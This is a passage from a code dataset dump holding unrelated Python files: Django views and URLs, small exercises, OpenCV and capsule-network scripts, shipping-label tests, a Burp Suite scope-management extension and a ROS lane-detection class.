eq[1], numcomps)]\n\treturn testdata \n\ntestdata = formatcomps()\n\ndef structuretestdata(): \n\t\"\"\" ** Description of method ***\n\t\n\tReturns\n\t-------\n\t(array, array, array)\n\t\tx - 28x28 tensor for image pixels (one single component)\n\t\ty - bounding box coordinates for x (in equation)\n\t\tz - holds the image path for the original equation\n\t\tnum - number of components for the equation in z\n\t\"\"\"\n\tsize = len(testdata)\n\tx = np.zeros((size, 32*32), dtype=np.float32) # important to specify dtype=np.float32, otherwise UnicodeDecodeError\n\ty = np.empty((size, 4), dtype=np.int32) # holds bounding box coordinates\n\tz = np.empty((size, 1), dtype=' math.sqrt(n): break\n\t\telif n % p == 0:\n\t\t\tprime = False\n\t\t\tbreak\n\tif prime: primes.append(n)\n\tn += 2\n\nprint('Answer:', primes[10000])\n","sub_path":"007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"620824093","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom index import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^sql/$', views.sql_view, name='sql_view'),\n url(r'^sql_insert/$', views.sql_insert, name='sql_insert'),\n url(r'^table/$', views.table_view, name='table_view'),\n url(r'^table/(?P.+)$', views.table_view, name='table_view'),\n url(r'^init/$', views.init_db, name='init_db'),\n]\n","sub_path":"index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"377311903","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/pierre/workspace/django-survey/survey/tests/exporter/tex/test_question2tex_sankey.py\n# Compiled at: 2020-02-25 02:49:28\n# Size of source mod 2**32: 1192 bytes\nfrom survey.exporter.tex.question2tex_sankey import Question2TexSankey\nfrom survey.tests.management.test_management import TestManagement\n\nclass TestQuestion2TexSankey(TestManagement):\n\n def test_other_question_type(self):\n \"\"\" We get a type error if we do not give a Question. \"\"\"\n question = self.survey.questions.get(text='Aèbc?')\n self.assertRaises(TypeError, Question2TexSankey.__init__, question, {'other_question': 'other_question'})\n other_question = self.survey.questions.get(text='Aèbc?')\n q2s = Question2TexSankey(question, other_question=other_question)\n self.assertIsNotNone(q2s.tex())","sub_path":"pycfiles/django_survey_and_report-1.3.21-py3-none-any/test_question2tex_sankey.cpython-37.py","file_name":"test_question2tex_sankey.cpython-37.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362065137","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nn= int(input())\na = set(map(int, input().split()))\nN = int(input())\nfor i in range(N):\n str_ = input().split()\n cmd = str_[0]\n b = set(map(int, input().split()))\n if(cmd == \"update\"):\n a.update(b)\n elif(cmd == \"intersection_update\"):\n a.intersection_update(b)\n elif(cmd == \"difference_update\"):\n a.difference_update(b)\n elif(cmd == \"symmetric_difference_update\"):\n a.symmetric_difference_update(b)\nprint(sum(a))\n","sub_path":"HackerRank-Python Practice/04. Set/010. Set Mutations.py","file_name":"010. Set Mutations.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653568726","text":"import cv2\r\nimport numpy as np\r\nimport math\r\nimg = cv2.imread('picture.jpg')#读取原图像,左上为原点\r\nrows = img.shape[0] #取图片的行数,即高度\r\ncols = img.shape[1] #取图片的列数,即宽度\r\nprint(\"图像的高度:\",rows,\"图像的宽度:\",cols)\r\ncenter_x=int(input(\"请输入旋转中心x:(请在图像的宽度范围内输入):\"))\r\ncenter_y=int(input(\"请输入旋转中心y:(请在图像的宽度范围内输入):\"))\r\ncenter=[center_x,center_y] #设置图片中心\r\nresult=np.zeros((rows,cols,3),dtype=np.uint8) #创建一样大小的转换结果\r\nbeta=int(input(\"请输入旋转角度:\"))*math.pi/180\r\ntransform=np.array([[math.cos(beta),-math.sin(beta),0],\r\n [math.sin(beta), math.cos(beta),0],\r\n [0,0,1]]) #转换矩阵\r\ncv2.imshow('original_picture',img)#显示原图片\r\nfor i in range(rows):\r\n for j in range(cols):\r\n img_pos=np.array([i-center[0],j-center[1],1]) #记录结果位置\r\n [x, y, z] = np.dot(transform, img_pos) #转换为原图位置坐标\r\n x = int(x)+center[0] #取整\r\n y = int(y)+center[1] #取整\r\n if x >= rows or y >= cols or x < 0 or y < 0: #如果出界\r\n result[i][j] = 255 #该点为白色\r\n else:\r\n result[i][j] = img[x][y] #不出界把原图位置对应值取来\r\ncv2.imshow('result_process', result) #显示结果\r\ncv2.waitKey(0) #按任意键继续\r\n","sub_path":"homework01/code/lianxi02_ImageRotation_2.py","file_name":"lianxi02_ImageRotation_2.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"262023001","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom .models import * # import ALL models\nfrom django.contrib import messages # validation\nimport bcrypt # password encryption\nfrom django.conf import settings # map settings\nfrom datetime import datetime # events/activities date -time\n\n\ndef index(request):\n request.session.flush()\n return render(request, 'index.html')\n\ndef logout(request):\n request.session.flush()\n messages.success(request, 'You have logged out successfully!')\n return redirect('/ABC')\n\ndef login(request):\n if request.method == 'POST':\n print(request.POST) # should see QueryDict\n\n errors = User.objects.login_validator(request.POST)\n print(errors)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n\n return render(request, 'partialMsgs.html') # AJAX!!!\n # return redirect('/ABC') #redirect the user back to the form to fix the errors\n else:\n\n this_user = User.objects.get(email=request.POST['email'])\n request.session['user_id'] = this_user.id\n # messages.success(request, \"You have successfully logged in!\")\n return redirect('/ABC/myEvents')\n\n\ndef regForm(request):\n return render(request, 'regForm.html')\n\n\ndef register(request):\n if request.method == 'POST':\n print(request.POST) # should see QueryDict\n\n errors = User.objects.reg_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return render(request, 'partialMsgs.html') # AJAX!!!\n # return redirect('/ABC/regForm') #redirect the user back to the form to fix the errors\n else:\n hashed_pw = bcrypt.hashpw(\n request.POST['password'].encode(), bcrypt.gensalt()).decode()\n new_user = User.objects.create(\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n email=request.POST['email'],\n password=hashed_pw)\n request.session['user_id'] = new_user.id\n # messages.success(request, \"You have successfully registered!\")\n return redirect('/ABC/dashboard')\n\n\ndef childForm(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n\n user = User.objects.get(id=request.session['user_id'])\n context = {\n 'user': user,\n }\n return render(request, 'childForm.html', context)\n\n\ndef regChild(request):\n if request.method == \"POST\":\n\n errors = Child.objects.child_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/ABC/childForm') # redirect the user back to the form to fix the errors\n\n else:\n user = User.objects.get(id=request.session['user_id'])\n\n Child.objects.create(\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n birth_date=request.POST['birth_date'],\n gender=request.POST['child_gender'],\n age=request.POST['child_age'],\n program=request.POST['child_program'],\n parent_child=user,\n )\n\n # when successful Register a Child is click redirect back to myProfile\n return redirect('/ABC/myProfile')\n\n\ndef myProfile(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n children = user.enrolled_parent.all()\n context = {\n 'user': user,\n 'children': children,\n }\n return render(request, 'myProfile.html', context)\n\n\ndef update_myProfile(request):\n if request.method == \"POST\":\n errors = User.objects.password_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/ABC/myProfile')\n else:\n hashed_pw = bcrypt.hashpw(\n request.POST['password'].encode(), bcrypt.gensalt()).decode()\n user = User.objects.get(id=request.session['user_id'])\n user.password = hashed_pw\n user.save()\n return redirect('/ABC/dashboard')\n\n\ndef remove_child_myProfile(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n else:\n if request.method == \"POST\":\n child = Child.objects.get(id=request.POST['child_id'])\n child.delete()\n return redirect('/ABC/myProfile')\n else:\n return redirect('/ABC')\n\ndef remove_event_myEvents(request):\n # if 'event_id' not in request.session:\n # return redirect('/ABC/myEvents')\n # else:\n if request.method == \"POST\":\n event= Event.objects.get(id=request.POST['event_id'])\n event.delete()\n return redirect('/ABC/myEvents')\n else:\n return redirect('/ABC')\n\ndef myEvents(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n past_events=Event.objects.filter(event_date__lte = datetime.today(), user_event = User.objects.get(id=request.session['user_id']) )\n future_events=Event.objects.filter(event_date__gte = datetime.today(), user_event = User.objects.get(id=request.session['user_id']) )\n child=Child.objects.filter(parent_child=user)\n context = {\n 'user': user,\n 'past_events': past_events,\n 'future_events':future_events,\n 'child': child,\n }\n return render(request, 'myEvents.html', context)\n\n\ndef dashboard(request):\n if 'user_id' not in request.session:\n messages.error(request, \"Need to register or login buddy!\")\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n events = Event.objects.filter(event_date__gte = datetime.today())\n\n context = {\n 'user': user,\n 'events': events,\n # 'total_num': total_num,\n }\n return render(request, 'dashboard.html', context)\n\n\ndef viewJoin(request, event_id):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n children = user.enrolled_parent.all()\n event = Event.objects.get(id=event_id)\n context = {\n 'user': user,\n 'children': children,\n 'user_event': event,\n }\n return render(request, 'newJoin.html', context)\n\n\ndef requestJoin(request, event_id):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n else:\n if request.method == \"POST\":\n user = User.objects.get(id=request.session['user_id'])\n children = user.enrolled_parent.all()\n event = Event.objects.get(id=event_id)\n check_boxes = request.POST.getlist('childrenJoin', [])\n for checkbox_result in check_boxes:\n selected_child = Child.objects.get(\n id=checkbox_result)\n event.child_event.add(selected_child)\n print(checkbox_result)\n event.save()\n return redirect('/ABC/myEvents')\n else:\n return redirect('/ABC/{event_id}/newJoin')\n\n\n\ndef confirmJoin(request, event_id):\n this_event = Event.objects.filter(id=event_id) #d_id comes from the urls.py parm. FILTER is SO important here -do not use GET! \n if len(this_event) != 1:\n return redirect('/ABC/dashboard')\n user = User.objects.get(id=request.session['user_id'])\n context = {\n 'one_event': this_event[0], #need this because it is a list. grab \"value\" to initially populate record for the update/view\n 'user': user,\n 'api_key': settings.SECRET_KEY2, #if inspect -unfortunately you can still see the key!\n 'messages_list': this_event[0].eventmessages_join.all().order_by(\"-created_at\"), #only messages for this SPECIFIC event\n }\n return render(request, 'confirmJoin.html', context) \n\n\ndef create_msg(request, event_id):\n errors = Message.objects.msg_validator(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n else: \n if request.method == \"POST\":\n this_event = Event.objects.filter(id=event_id) \n Message.objects.create(\n msg_content=request.POST['msg_content'],\n msg_UsrJoin=User.objects.get(id=request.session['user_id']), #comes from the login \n msg_EventJoin=this_event[0], \n )\n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef create_comment(request, event_id, msg_id):\n errors = Comment.objects.comm_validator(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value) \n else: \n if request.method == \"POST\": \n this_msg = Message.objects.get(id=msg_id)\n Comment.objects.create(com_content=request.POST['com_content'],\n com_UserJoin=User.objects.get(id=request.session['user_id']), #c#comes from the login \n msg_CommJoin=this_msg, #join the comment with the message\n ) \n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef delete_comment(request, event_id, comm_id):\n this_comm = Comment.objects.get(id=comm_id)\n this_Logged_user = User.objects.get(id=request.session['user_id'])\n\n if this_comm.com_UserJoin == this_Logged_user: #only owner of comment can delete OR in html -just show \"delete\" to owner. \n this_comm.delete() \n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef add_like(request, event_id, msg_id):\n liked_message = Message.objects.get(id=msg_id)\n user_liking = User.objects.get(id=request.session['user_id'])\n liked_message.user_likes.add(user_liking)\n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef remove_like(request, event_id, msg_id):\n liked_message = Message.objects.get(id=msg_id)\n user_liking = User.objects.get(id=request.session['user_id'])\n liked_message.user_likes.remove(user_liking)\n return redirect(f'/ABC/{event_id}/confirmJoin')\n\n\n\n","sub_path":"group_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"621244945","text":"#!/usr/bin/python\nfrom pycam import VideoCapturePlayer\nfrom pycam import pygameFaceDetect\nfrom pycam.filters import outlineEdges\n\ndef process(surf):\n faces = pygameFaceDetect.getFaces(surf)\n surf = outlineEdges(surf)\n if faces:\n pygameFaceDetect.drawFacesOnSurface(surf, faces)\n return surf\n\nif __name__ == \"__main__\":\n vcp = VideoCapturePlayer(processFunction=process)\n vcp.main()\n pygame.quit()\n \n","sub_path":"pycam/examples/opencv/FaceAndEdgeDetect.py","file_name":"FaceAndEdgeDetect.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358062976","text":"# -*- coding: utf-8 -*-\n\n# MIT License\n#\n# Copyright (c) 2018 Tijme Gommers\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom urlparse import urlparse\n\nimport re\nimport json\n\nclass GraphWaveConfig:\n \"\"\"The GraphWave config contains dicts that can be used or loaded into Burp Suite.\n\n Attributes:\n data dict(obj): A Burp Suite JSON dict that can be imported into Burp Suite.\n includeList list(str): A list with unique code flow URLs.\n excludeList list(str): A list with similar code flow URLs.\n\n \"\"\"\n\n data = {}\n\n includeList = []\n\n excludeList = []\n\n def __init__(self, callbacks):\n \"\"\"Initiate the config by resetting to a clean state.\n\n Args:\n callbacks (obj): The Burp Suite callbacks (a Java Jython class).\n\n \"\"\"\n\n self.callbacks = callbacks\n self.reset()\n\n def reset(self):\n \"\"\"Reset the config to a clean state.\"\"\"\n\n # Load the current Burp Suite config and tweak it for GraphWave use.\n self.data = json.loads(self.callbacks.saveConfigAsJson(\"target.scope\"))\n self.data[\"target\"][\"scope\"][\"advanced_mode\"] = True\n self.data[\"target\"][\"scope\"][\"exclude\"] = []\n del self.data[\"target\"][\"scope\"][\"include\"]\n\n # Reset the include and exclude list.\n self.includeList = []\n self.excludeList = []\n\n def generateExcludeObject(self, url):\n \"\"\"Generate an exclude object from an URL so it can be loaded into the\n 'advanced scope control' option from Burp Suite.\n\n Args:\n url (str): The URL that should be converted to a Burp Suite scope control object.\n\n Returns:\n obj: The Burp Suite scope control object for this specific URL.\n\n \"\"\"\n\n parsed = urlparse(url)\n\n port = parsed.port if parsed.port else \"\"\n\n query = \"?\" + parsed.query if parsed.query else \"\"\n file = re.escape(parsed.path + query)\n\n return {\n \"enabled\": True,\n \"file\": \"^\" + file + \"$\",\n \"host\": \"^\" + re.escape(parsed.netloc.split(':')[0]) + \"$\",\n \"port\": \"^\" + str(port) + \"$\",\n \"protocol\": parsed.scheme\n }\n\n def include(self, url):\n \"\"\"Add a specific URL to the include list. The include list can be\n exported to a TXT file by the user.\n\n Args:\n url (str): The URL that should be included.\n\n \"\"\"\n\n if url not in self.includeList:\n self.includeList.append(url)\n\n def exclude(self, url):\n \"\"\"Add a specific URL to the exclude list. The exclude list can be\n exported to a TXT file or be marked out of scope by the user.\n\n Args:\n url (str): The URL that should be excluded.\n\n \"\"\"\n\n if url not in self.excludeList:\n self.excludeList.append(url)\n\n self.data[\"target\"][\"scope\"][\"exclude\"].append(\n self.generateExcludeObject(url)\n )\n","sub_path":"extension/GraphWaveConfig.py","file_name":"GraphWaveConfig.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568101081","text":"import os\nfrom functools import partial\n\nimport torch\nfrom keras.utils import to_categorical\nfrom torchvision.transforms import transforms\nimport torch.utils.data as Data\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\nfrom few_shot.capsule_network.capsule_tst_predict import ConvCapsule, device\nfrom torchvision import datasets\n\nnp.random.seed(123)\ndef main():\n root = os.path.dirname(__file__) + '/data'\n\n x_trans = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n y_trans = partial(to_categorical, num_classes=10)\n\n # 重构dataset\n x_test, y_test = torch.load(os.path.join(root, 'processed', 'test.pt'))\n x_test, y_test = x_test.numpy(), y_test.numpy()\n\n y_test_oh = y_trans(y_test)\n\n\n idx = list(range(len(y_test_oh)))\n np.random.shuffle(idx)\n X_test = np.concatenate([x_test, x_test[idx]], 1)\n Y_test = np.vstack([y_test_oh.argmax(1), y_test_oh[idx].argmax(1)]).T\n\n not_equal = Y_test[:, 0] != Y_test[:, 1]\n\n y_test_oh = y_test_oh[not_equal]\n y_test_upt = y_test[not_equal]\n X_test = X_test[not_equal]\n Y_test = Y_test[not_equal]\n Y_test.sort(axis=1)\n\n X_test = np.array([x_trans(Image.fromarray(X_test[i], mode='L')).numpy() for i in range(len(X_test))])\n\n testsets = Data.TensorDataset(torch.tensor(X_test), torch.tensor(y_test_oh))\n test_loader = Data.DataLoader(\n dataset=testsets,\n batch_size=128,\n shuffle=False\n )\n\n model = ConvCapsule()\n model.to(device)\n\n model.load_state_dict(torch.load(os.path.dirname(__file__) + '/model_dir/caps_model.pt',\n map_location='cpu' if not torch.cuda.is_available() else None))\n\n with torch.no_grad():\n model.eval()\n test_pred_list = []\n for x, y_oh in tqdm(test_loader):\n x, y_oh = x.to(device), y_oh.to(device)\n\n _, test_pred = model(x, y_oh)\n test_pred_list.extend(test_pred.numpy())\n\n greater = np.sort(np.array(test_pred_list), axis=1)[:, -2] > 0.5\n test_preds = np.array(test_pred_list).argsort()[:, -2:]\n test_preds.sort(axis=1)\n\n acc = 1.*(np.prod(test_preds == Y_test, axis=1)).sum()/len(X_test)\n print(u'CNN+Capsule,不考虑置信度的准确率为:%s' % acc)\n acc = 1.*(np.prod(test_preds == Y_test, axis=1)*greater).sum()/len(X_test)\n print(u'CNN+Capsule,考虑置信度的准确率为:%s' % acc)\n\n # testsets = Data.TensorDataset(torch.tensor(x_test),\n # torch.tensor(y_test))\n # test_loader = Data.DataLoader(\n # dataset=testsets,\n # batch_size=128,\n # shuffle=False\n # )\n #\n # test_pred_list = []\n # total_test_acc = 0\n #\n # with torch.no_grad():\n # model.eval()\n # for data, target in tqdm(test_loader):\n # data, target = data.to(device), target.to(device)\n # _, test_pred = model(data, target)\n #\n # test_pred_list.extend(test_pred.numpy())\n #\n # total_test_acc += len(np.where(np.argmax(target, 1) == np.argmax(test_pred, 1))[0])\n #\n # # 方法1\n # total_test_acc_rate = total_test_acc/len(x_test)\n # print(f'方法1 acc: {total_test_acc_rate}')\n #\n # # 方法2\n # test_preds = np.array(test_pred_list).argsort()[:, -1]\n # acc = 1. * (test_preds == np.argmax(y_test, 1)).sum() / len(x_test)\n # print(f'方法2 acc: {acc}')\n #\n #\n #\n #\n #\n # test_set = datasets.MNIST(root=root, train=False, transform=x_trans, download=False)\n #\n # test_loader = torch.utils.data.DataLoader(\n # dataset=test_set,\n # batch_size=128,\n # shuffle=False)\n #\n # total_test_loss = 0\n # total_test_acc = 0\n # with torch.no_grad():\n # model.eval()\n #\n # for data, target in tqdm(test_loader):\n # data = data.to(device)\n # new_target = torch.from_numpy(to_categorical(target.numpy(), 10)).to(device)\n # test_loss, test_pred = model(data, new_target)\n # total_test_loss += test_loss.item()\n #\n # total_test_acc += len(np.where(target == np.argmax(test_pred.cpu(), axis=1))[0])\n #\n # total_test_acc_rate = total_test_acc/len(test_loader.dataset)\n # print(f'test acc: {total_test_acc_rate}')\n #\n # print('Done')\n\n\n # build DataLoader\n\n\n\n # load model\n # predict\n\n\nif __name__ == '__main__':\n main()","sub_path":"few_shot/capsule_network/capsule_tst_predict_2.py","file_name":"capsule_tst_predict_2.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"648523088","text":"from datetime import datetime\n\nfrom django.test import TestCase\n\nfrom .models import ShippingLabel\nfrom .service.constants.service_codes import *\n\nfrom django.contrib.auth.models import User\nfrom apps.common.models import Address\nfrom apps.customers.models import Customer\nfrom apps.externals.models import Brand\nfrom apps.sales.models import Cart, CartedOffer, SalesOrder, Parcel, SentProduct\nfrom apps.spod.models import Sku, Product, Offer\n\n\nclass ShippingLabelTests(TestCase):\n\n def setUp(self):\n user = User.objects.create_user('some user', '', 'password', first_name='some', last_name='user')\n\n customer = Customer(user_profile=user)\n customer.save()\n\n address = Address(\n street1='213 N Racine',\n city='Chicago',\n state='IL',\n postal_code='60642'\n )\n address.save()\n customer.shipping_addresses.add(address)\n\n brand = Brand(name='some brand')\n brand.save()\n\n sku_under = Sku(\n number=123,\n name='some sku',\n brand=brand,\n weight=10\n )\n sku_under.save()\n\n product_under = Product(\n sku=sku_under,\n skus_per=1\n )\n product_under.save()\n\n offer_under = Offer(\n title='some title',\n price=10.99\n )\n offer_under.save()\n offer_under.products.add(product_under)\n\n cart_under = Cart(\n customer=customer\n )\n cart_under.save()\n\n carted_offer_under = CartedOffer(\n cart=cart_under,\n offer=offer_under,\n quantity=1\n )\n carted_offer_under.save()\n\n sales_order_under = SalesOrder(\n cart=cart_under,\n shipping=0,\n tax=0\n )\n sales_order_under.save()\n\n self.parcel_under = Parcel(\n sales_order=sales_order_under,\n sent_on=datetime.now()\n )\n self.parcel_under.save()\n\n sent_prod = SentProduct(\n parcel=self.parcel_under,\n product=product_under,\n quantity=1\n )\n sent_prod.save()\n\n sku_over = Sku(\n number=124,\n name='some sku',\n brand=brand,\n weight=20\n )\n sku_over.save()\n\n product_over = Product(\n sku=sku_over,\n skus_per=1\n )\n product_over.save()\n\n offer_over = Offer(\n title='some title over a pound',\n price=10.99\n )\n offer_over.save()\n offer_over.products.add(product_over)\n\n cart_over = Cart(\n customer=customer\n )\n cart_over.save()\n\n carted_offer_over = CartedOffer(\n cart=cart_over,\n offer=offer_over,\n quantity=1\n )\n carted_offer_over.save()\n\n sales_order_over = SalesOrder(\n cart=cart_over,\n shipping=0,\n tax=0\n )\n sales_order_over.save()\n\n self.parcel_over = Parcel(\n sales_order=sales_order_over,\n sent_on=datetime.now()\n )\n self.parcel_over.save()\n\n sent_prod = SentProduct(\n parcel=self.parcel_over,\n product=product_over,\n quantity=1\n )\n sent_prod.save()\n\n def test_as_image(self):\n import os\n self.parcel_over.make_shipping_label(UPS_GROUND)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)[0]\n sl.as_image('test.png')\n os.remove('test.png')\n\n def test_dhl_express_under_pound(self):\n self.parcel_under.make_shipping_label(DHL_EXPEDITED_UNDER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_under)\n self.assertGreater(sl.count(), 0)\n\n def test_dhl_express_over_pound(self):\n self.parcel_over.make_shipping_label(DHL_EXPEDITED_OVER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)\n self.assertGreater(sl.count(), 0)\n\n def test_dhl_ground_under_pound(self):\n self.parcel_under.make_shipping_label(DHL_GROUND_UNDER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_under)\n self.assertGreater(sl.count(), 0)\n\n def test_dhl_ground_over_pound(self):\n self.parcel_over.make_shipping_label(DHL_GROUND_OVER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)\n self.assertGreater(sl.count(), 0)\n\n def test_ups_ground(self):\n self.parcel_over.make_shipping_label(UPS_GROUND)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)\n self.assertGreater(sl.count(), 0)\n","sub_path":"apps/abol/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192430539","text":"#!/usr/bin/python3\n#---Import---#\n#---ROS\nimport rospy,sys,os\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import CompressedImage\nfrom BienBaoClasssifier import BienBaoClassifier\nimport time\nimport cv2\nimport numpy as np\nimport scipy.ndimage as sp\nfrom threading import Thread\nimport os\ntry:\n\tos.chdir(os.path.dirname(__file__))\t\n\tos.system('clear')\n\tprint(\"\\nWait for initial setup, please don't connect anything yet...\\n\")\n\tsys.path.remove('/opt/ros/lunar/lib/python2.7/dist-packages')\nexcept: pass\ndef print_ros(str_):\n rospy.loginfo(str_)\n\ndef nothing(x):\n pass\n\nclass Team500_CDS_ROS(object):\n def __init__(self, NameTeam='team500', drawImage=False, drawBird=False, limitSpeed=[0, 60], limitAngle=[-30, 30]):\n self.frame = None\n self.limitSpeed = limitSpeed\n self.limitAngle = limitAngle\n self.Speed = 0\n self.Angle = 0\n self.First_time = True\n self.dsize_cut = [0, 0]\n self.Topic_Image = NameTeam + '_image/compressed'\n self.Topic_Speed = NameTeam + '_speed'\n self.Topic_Angle = NameTeam + '_steerAngle'\n self.pub_Speed = None\n self.pub_Angle = None\n self.sub_Image = None\n self.Speed = 50\n self.drawBird = drawBird\n self.drawImage = drawImage\n self.draw_Top = 80\n self.draw_Bot = 77\n self.BienBao_delay_set = 10\n self.BienBao_flag = 2\n self.BienBao_delay = 0\n self.Goc = 30\n self.draw_TopCenter = 25\n self.draw_BotCenter = 160\n self.BirdA = []\n self.Label_bienbao = ['Re Trai', 'Re Phai']\n self.On_Play = False\n self.Continue = True\n self.Trai = None\n self.Phai = None\n self.Thang = None\n self.Thang_flag = 0\n self.Control = 0\n self.draw_Lane()\n self.run()\n\n def draw_Lane(self):\n h, w = [240, 320]\n Trai = np.array( [[[0, h//4],[w//2,h//4],[(w//4)*3,h//2],[(w//4)*3,h],[0,h]]], dtype=np.int32)\n self.Trai = cv2.fillPoly( np.zeros([240,320],dtype=np.uint8), Trai, 255 )\n Phai = np.array( [[[w, h//4],[w//2,h//4],[w//4,h//2],[w//4,h],[w,h]]], dtype=np.int32)\n self.Phai = cv2.fillPoly( np.zeros([240,320],dtype=np.uint8), Phai, 255 )\n Thang = np.array( [[[w//4, 0],[(w//4)*3,0],[(w//4)*3,h],[w//4,h]]], dtype=np.int32)\n self.Thang = cv2.fillPoly( np.zeros([240,320],dtype=np.uint8), Thang, 255 )\n\n def RoadDetect(self, image, Low=[30, 8, 69], High=[66, 35, 99]):\n h, w = image.shape[:2]\n # shadow = self.Shadow(image)\n # LineWhite = self.LineWhite(image)\n # HSV = cv2.cvtColor(image[h - 80:h, w // 2 - 90:w // 2 + 90, :], cv2.COLOR_BGR2HSV)\n # H = HSV[..., 0]\n # S = HSV[..., 1]\n # V = HSV[..., 2]\n Low_HSV = Low\n High_HSV = High\n image = cv2.inRange(cv2.cvtColor(image, cv2.COLOR_BGR2HSV), np.array(Low_HSV),\n np.array(High_HSV))\n # print_ros(self.Trai.dtype)\n # print_ros(self.Phai.dtype)\n # print_ros(self.BienBao_flag)\n if self.BienBao_flag == 0:\n image = cv2.bitwise_or(image, image, mask=self.Trai)\n elif self.BienBao_flag == 1:\n image = cv2.bitwise_or(image, image, mask=self.Phai)\n image, pts, K = self.Road_Find(image)\n return image, pts, K\n\n def Road_Find(self, img, winsize=9, margin=150, minpix=1500):\n h, w = img.shape[:2]\n histogram = np.sum(img[2 * (h // 3):, w // 2 - 30: w // 2 + 30], axis=0)\n F_img = cv2.merge((img, img, img))\n mid_Road = int(np.mean(np.where(histogram == np.max(histogram)))) + w // 2 - 30\n\n win_heigh = np.int(h / winsize)\n\n nonzero_y, nonzero_x = img.nonzero()\n F = np.zeros_like(img)\n mid_x = mid_Road\n mid_road = []\n KKKK = 0\n for win in range(winsize):\n win_y_low = h - (win + 1) * win_heigh\n win_y_high = h - win * win_heigh\n win_x_low = mid_x - margin\n win_x_high = mid_x + margin\n cv2.rectangle(F_img, (win_x_high, win_y_high), (win_x_low, win_y_low), (255, 0, 0), 2)\n\n mid_x_good = ((nonzero_x >= win_x_low) & (nonzero_x < win_x_high)\n & (nonzero_y >= win_y_low) & (nonzero_y < win_y_high)).nonzero()[0]\n if len(mid_x_good) > minpix:\n mid_x = np.int(np.mean(nonzero_x[mid_x_good]))\n KKKK += 1\n mid_road.append(mid_x_good)\n mid_road = 